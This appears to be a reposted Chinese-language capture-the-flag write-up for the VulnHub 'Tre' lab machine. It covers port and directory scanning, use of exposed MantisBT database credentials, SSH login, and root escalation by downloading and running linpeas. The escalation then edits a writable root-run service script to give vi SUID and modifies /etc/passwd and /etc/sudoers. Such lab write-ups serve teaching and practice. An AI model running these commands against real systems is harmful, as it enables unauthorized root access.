Tre靶场通关过程（linpeas使用+启动项编辑器提权）

news2024/10/7 18:24:18

Tre靶场通关

通过信息收集获得到了普通用户账号密码，利用PEASS-ng的linpeas脚本进行提权的信息收集，根据已有信息进行提权。

靶机下载地址：

https://download.vulnhub.com/tre/Tre.zip

信息收集

靶机IP探测：192.168.0.129

arp-scan -l

在这里插入图片描述

端口扫描

nmap -p 1-65535 -sV -A 192.168.0.129
22
80
8082

在这里插入图片描述

目录扫描

python dirsearch.py -u "http://192.168.0.129"

在这里插入图片描述

info.php

在这里插入图片描述

adminer.php

在这里插入图片描述

dirsearch默认字典没扫除其他有用信息，看别人通关原来是字典的原因，利用dirb大字典扫描目录

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述

dirb扫描文件用以下命令

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt -X .php

在扫描的

http://192.168.0.129/mantisbt/config/ 目录下的a.txt文件发现数据库的信息

在这里插入图片描述

# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';

在adminer.php页面进行登录

在这里插入图片描述

找到了用户密码信息

在这里插入图片描述

其中Tre用户可以直接ssh登录

usr:tre
pwd:Tr3@123456A!

ssh tre@192.168.0.129

在这里插入图片描述

提权阶段

接下来对tre用户进行提权

主要学习下LinPEAS这个提权脚本（Linux/Unix/MacOS），同PEASS-ng里还有Windows的提权脚本WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh

LinPEAS是一个没有任何依赖的脚本，它使用/bin/sh语法，用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下，LinPEAS 不会向磁盘写入任何内容，也不会尝试以任何其他用户身份使用 su 。

该脚本工具枚举并搜索主机内部可能的错误配置（已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户（top1000pwds）、密码…），并用颜色突出显示可能的错误配置。

给执行权限，看一下命令参数

chmod 777 linpeas.sh
./linpeas.sh -h

在这里插入图片描述

开启http服务将脚本传到靶机

python -m http.server 80

靶机执行

wget http://192.168.0.130/linpeas.sh

在这里插入图片描述

给权限运行脚本，由于内容比较多输出到一个文件中方便查看

./linpeas.sh > 1.txt

在kali攻击机中将生成的文件拷贝出来

rsync -avz tre@192.168.0.129:/home/tre/1.txt /root/linpeas.txt

-a:保持原属性
-v：详细信息
-z：在传输文件时压缩减少网络带宽占用

对生成的报告文件进行分析

more linpeas.txt

内嵌了linux-exploit-suggester,可以根据扫描出的内核漏洞进行提权

在这里插入图片描述

发现存在一条/bin/bash /usr/bin/check-system的进程，是root用户启动的
在这里插入图片描述

查看check-system脚本

cat /usr/bin/check-system

在脚本中发现该脚本的作用是输出Service started at+当前日期，重定向到系统日志等级为info，之后跟了一段死循环一直Checking…让我们发现这个进程用的

在这里插入图片描述

不难判断这个一定是开机自启动项，验证一下

ls /etc/systemd/system
cat /etc/systemd/system/check-system.service

在这里插入图片描述

或者直接

systemctl list-unit-files | grep enable

在这里插入图片描述

提权思路有了：更改这个脚本给vi编辑器s权限，让服务器重启生效，通过vi修改/etc/passwd

有两个问题需要判断：

1.脚本是否有写权限（有）

在这里插入图片描述

2.服务器如何重启

发现tre用户有shutdown的sudo权限

在这里插入图片描述

利用命令重启

sudo shutdown -r now

发现条件都具备了，修改脚本

在这里插入图片描述

进行重启，重新连接，之后vi编辑器就具备了sudo权限，可以横着走了

想改/etc/passwd加一条用户

tpa:123456:0:0:tpa:/root:/bin/bash

但不知道为什么利用用户tpa和密码123456登录不上去

尝试其他方法，想到修改sudo权限，给tre用户增加全部命令的sudo权限

vi /etc/sudoers

在这里插入图片描述

直接利用sudo反弹到root，拿到flag

sudo /bin/bash

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/499300.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！